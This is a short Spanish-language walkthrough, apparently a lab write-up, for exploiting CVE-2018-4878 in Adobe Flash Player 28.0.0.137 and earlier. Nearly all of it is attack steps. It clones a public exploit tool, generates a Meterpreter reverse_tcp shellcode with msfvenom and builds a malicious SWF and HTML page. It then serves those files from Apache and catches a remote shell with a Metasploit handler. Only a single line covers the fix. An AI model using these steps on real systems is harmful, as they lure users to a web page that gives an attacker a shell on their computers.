Tabla de contenido
Descripción de la vulnerabilidad
Esta vulnerabilidad está dirigida a usuarios que han instalado la versión flash 28.0.0.137 o menos. El atacante induce a los usuarios a hacer clic en sitios web maliciosos para obtener directamente permisos de shell.
Versión de impacto
Menor o igual que la versión de Adobe Flash Player 28.0.0.137
Detección de vulnerabilidades
Utilice la herramienta:
https://github.com/anbai-inc/CVE-2018-4878
Coloque index.html y exploit.swf en nuestro propio servidor web y deje que la máquina de destino acceda a ellos. A veces, la computadora puede aparecer y, a veces, el navegador IE se bloquea. Se estima que el script es inestable.
Explotar
Adobe Flash Player 28.0.0.137 Descarga:
https://pan.baidu.com/s/1Si3PDbR6cGwkGITJUTikYg Código de extracción: p9ok
Máquina de ataque: kali
Máquina de destino: windows7 + Adobe Flash Player 28.0.0.137
Kali primero descarga la herramienta de uso:
git clone https://github.com/anbai-inc/CVE-2018-4878.git
cd CVE-2018-4878
msfvenom 生成 shellcode:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f python>./shellcode.txt
Reemplace el shellcode en el texto shellcode.txt con el shellcode en cve-2018-4847.py
Continúe modificando la ruta de generación de swf y html (directorio de generación de exp)
Ejecute el script para generar exp:
python cve-2018-4878.py
Inicie apache2:
service apache2 start
Copie exp en el directorio web:
cp exploit.swf /var/www/html/
cp index.html /var/www/html/
supervisión abierta de msf:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run
shell
whoami
Cuando el objetivo visite nuestro html generado, obtendrá permisos de shell
Pero más tarde descubrí que a veces no tiene éxito, lo que también causa, por ejemplo, un bloqueo.
Fortalecimiento de la vulnerabilidad
Actualizar el complemento flash: https://www.flash.cn/